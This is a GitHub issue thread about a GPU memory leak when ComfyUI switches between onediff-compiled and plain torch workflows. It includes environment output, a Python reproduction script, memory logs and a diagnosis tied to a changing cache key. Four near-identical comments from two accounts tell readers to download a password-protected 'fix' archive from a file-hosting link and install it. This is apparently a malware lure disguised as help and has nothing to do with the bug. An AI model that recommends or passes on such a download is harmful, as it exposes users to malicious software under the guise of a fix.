### ISSUE TITLE
[Bug] GPU memory leakage. 

### ISSUE THREAD

**Issue by niehen6174** [siliconflow/onediff#1095]
### Your current environment information

Collecting environment information...
PyTorch version: 2.3.1+cu121
Is debug build: False
CUDA used to build PyTorch: 12.1
ROCM used to build PyTorch: N/A

OneFlow version: path: ['/miniconda3/lib/python3.11/site-packages/oneflow'], version: 0.9.1.dev20240617+cu118, git_commit: ec7b682, cmake_build_type: Release, rdma: True, mlir: True, enterprise: False
Nexfort version: none
OneDiff version: 1.2.0
OneDiffX version: 1.2.0

CMake version: version 3.20.2
Libc version: glibc-2.28

Python version: 3.11.5 (main, Sep 11 2023, 13:54:46) [GCC 11.2.0] (64-bit runtime)
Python platform: Linux-5.4.119-1-tlinux4-0010.3-x86_64-with-glibc2.28
Is CUDA available: True
CUDA runtime version: 11.8.89
CUDA_MODULE_LOADING set to: LAZY
GPU models and configuration: 
GPU 0: NVIDIA A10

Nvidia driver version: 525.105.17
cuDNN version: Probably one of the following:
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv_infer.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv_train.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn_infer.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn_train.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops_infer.so.8.9.0
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops_train.so.8.9.0
HIP runtime version: N/A
MIOpen runtime version: N/A
Is XNNPACK available: True

CPU:
Architecture:        x86_64
CPU op-mode(s):      32-bit, 64-bit
Byte Order:          Little Endian
CPU(s):              224
On-line CPU(s) list: 0-223
Thread(s) per core:  2
Core(s) per socket:  56
Socket(s):           2
NUMA node(s):        2
Vendor ID:           AuthenticAMD
CPU family:          25
Model:               1
Model name:          AMD EPYC 7K83 64-Core Processor
Stepping:            0
CPU MHz:             2545.218
BogoMIPS:            5090.43
Hypervisor vendor:   KVM
Virtualization type: full
L1d cache:           32K
L1i cache:           32K
L2 cache:            512K
L3 cache:            32768K

Versions of relevant libraries:
[pip3] diffusers==0.27.0
[pip3] numpy==1.26.4
[pip3] onnx==1.16.2
[pip3] onnxruntime==1.18.1
[pip3] open_clip_torch==2.26.1
[pip3] torch==2.3.1
[pip3] torch_scatter==2.1.2+pt23cu118
[pip3] torchsde==0.2.6
[pip3] torchvision==0.18.1
[pip3] transformers==4.27.1
[pip3] triton==2.3.1
[conda] numpy                     1.26.4                   pypi_0    pypi
[conda] open-clip-torch           2.26.1                   pypi_0    pypi
[conda] torch                     2.3.1                    pypi_0    pypi
[conda] torch-scatter             2.1.2+pt23cu118          pypi_0    pypi
[conda] torchsde                  0.2.6                    pypi_0    pypi
[conda] torchvision               0.18.1                   pypi_0    pypi
[conda] triton                    2.3.1                    pypi_0    pypi

### 🐛 Describe the bug

When using onediff_comfy_nodes, it has been observed that switching between a workflow using onediff and a workflow using torch (which utilize different model structures) can lead to issues with GPU memory leakage. 

Specifically, when switching from an onediff workflow to a torch workflow, the models do not seem to be unloaded properly. 
Attempts to invoke the _clear_old_graph method have proven ineffective.

 I am seeking solutions or ideas on how to properly unload onediff models.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by strint** [comment]
> switching from an onediff workflow to a torch workflow, the models do not seem to be unloaded properly.
Attempts to invoke the _clear_old_graph method have proven ineffective.

As I know, comfyui node may do node cache. This means that the node in the former workflow may not be destroyed. I think may this will cause the problem.

**Comment by niehen6174** [comment]
Yes, comfyui has a model caching mechanism. However, during my tests, I managed to bypass this caching by adjusting certain parameters and settings. By monitoring GPU memory usage and printing logs at the model cleanup point in comfyui, I was able to confirm that models were being cleaned up. In similar workflow switching tests, models using onediff were not cleaned up, whereas those using torch were, and repeated switching resulted in continuous increases in GPU memory usage.

In my tests, I discovered that comfyui's model unloading process is not recognized by onediff, and it seems that onediff has not successfully hijacked the relevant unloading functions, leading to GPU memory leaks (this is my current hypothesis).

Additionally, I would like to know how to clean up a `<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module..MixedOneflowDeployableModule'>`. I have not yet found the corresponding function for this.

**Comment by niehen6174** [comment]
I have created a simple demo to simulate the workflow switching operation and observe the GPU memory usage. This should make it easier to understand and observe the issue, as it can be reliably reproduced.

```python
import torch
from diffusers import AutoencoderKL, UNet2DConditionModel
from onediff.infer_compiler import oneflow_compile
import subprocess
import os

def get_gpu_memory_usage(idx=0, infor=""):
	result = subprocess.run(['nvidia-smi', '--query-gpu=memory.used', '--format=csv,nounits,noheader'],
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
							text=True)
	if result.returncode != 0:
		print("Error executing nvidia-smi:", result.stderr)
		return None
 
	memory_used_list = []
	for line in result.stdout.strip().split('\n'):
		memory_used = int(line.strip())
		memory_used_list.append(memory_used)
        
	print(f"\033[31m[CUDA Memory] Infor: {infor}, {memory_used_list[idx]} MB\033[0m")
	return memory_used_list

def unet_infer(onediff: bool=True):
    model = UNet2DConditionModel()
    model = model.to("cuda")
    input_image = torch.randn(1, 4, 64, 64).to("cuda")
    encoder_hidden_states = torch.randn(1, 77, 1280).to("cuda")

    graph_path =f"/ComfyUI/models/onediff/graphs/Unet_test.graph"
    with torch.no_grad():
        if onediff:
            model = oneflow_compile(model)
            if os.path.exists(graph_path):
                model.load_graph(graph_path)
        output = model(input_image, 1, encoder_hidden_states)
        print(type(model))
        if onediff and not os.path.exists(graph_path):
            model.save_graph(graph_path)

def vae_infer(onediff: bool=True):
    vae = AutoencoderKL() 
    vae = vae.to("cuda")
    input = torch.randn(1, 4, 64, 64)
    input = input.to("cuda")

    graph_path =f"/ComfyUI/models/onediff/graphs/Decoder_test.graph"
    with torch.no_grad():
        if onediff:
            vae.decoder = oneflow_compile(vae.decoder)
            if os.path.exists(graph_path):
                vae.decoder.load_graph(graph_path)
        output = vae.decode(input)
        print(type(vae.decoder))
        if onediff and not os.path.exists(graph_path):
            vae.decoder.save_graph(graph_path)
    
    # if hasattr(vae.decoder, "_clear_old_graph"):
    #     vae.decoder._clear_old_graph()

test_vae = True

get_gpu_memory_usage(3, "Test Begin ")
for i in range(3):
    if test_vae:
        vae_infer(False)
        get_gpu_memory_usage(3, f"Vae torch end{i+1} ")
        vae_infer(True)
        get_gpu_memory_usage(3, f"Vae onediff end{i+1}")
    else:
        unet_infer(False)
        get_gpu_memory_usage(3, f"Unet torch end{i+1} ")
        unet_infer(True)
        get_gpu_memory_usage(3, f"Unet onediff end{i+1}") 
```

When the `test_vae` is True:
```shell
[CUDA Memory] Infor: Test Begin , 2 MB
<class 'diffusers.models.autoencoders.vae.Decoder'>
[CUDA Memory] Infor: Vae torch end1 , 1678 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Vae onediff end1, 3272 MB
<class 'diffusers.models.autoencoders.vae.Decoder'>
[CUDA Memory] Infor: Vae torch end2 , 3274 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Vae onediff end2, 3274 MB
<class 'diffusers.models.autoencoders.vae.Decoder'>
[CUDA Memory] Infor: Vae torch end3 , 3274 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Vae onediff end3, 3274 MB
```

When the `test_vae` is False:
```shell
[CUDA Memory] Infor: Test Begin , 2 MB
<class 'diffusers.models.unets.unet_2d_condition.UNet2DConditionModel'>
[CUDA Memory] Infor: Unet torch end1 , 5244 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Unet onediff end1, 9194 MB
<class 'diffusers.models.unets.unet_2d_condition.UNet2DConditionModel'>
[CUDA Memory] Infor: Unet torch end2 , 12598 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Unet onediff end2, 12598 MB
<class 'diffusers.models.unets.unet_2d_condition.UNet2DConditionModel'>
[CUDA Memory] Infor: Unet torch end3 , 12598 MB
<class 'onediff.infer_compiler.backends.oneflow.deployable_module.get_mixed_deployable_module.<locals>.MixedOneflowDeployableModule'>
[CUDA Memory] Infor: Unet onediff end3, 14964 MB
```

What can be seen is that using VAE does not result in cumulative growth of GPU memory, whereas using Unet does, which aligns with the situation I encountered in comfyui.

**Comment by niehen6174** [comment]
Due to Python's GC mechanism, the above script has problems and cannot prove anything.

**Comment by niehen6174** [comment]
I have found the reason for the increase in cuda memory. It is because when the workflow is switched, `OneDiffCheckpointLoaderSimple` is called again, generating a different `tmp_cache_key`, which causes the graph to increase, and the previous one is not cleaned up.

**Comment by Metal079** [comment]
> OneDiffCheckpointLoaderSimple

How do we stop this from happening? Im running into an issue where the vram quickly climbs and i run out of gpu memory, im trying to load multiple models at once

**Comment by niehen6174** [comment]
> > OneDiffCheckpointLoaderSimple
> 
> How do we stop this from happening? Im running into an issue where the vram quickly climbs and i run out of gpu memory, im trying to load multiple models at once

The specific cause of your issue isn't entirely clear. Whether it's due to an Out of Memory (OOM) error during the compilation of multiple models in a workflow using OneDiff, or when loading models, or after switching workflows, different scenarios can have different causes.

Additionally, the compilation of OneDiff is quite memory-intensive. If multiple models within a single workflow require compilation with OneDiff, it can lead to an OOM during the compilation process.

**Comment by rfan-debug** [comment]
It seems that the memory leak is from oneflow. Is there any chance to get the source code of oneflow so that we can debug this leak?
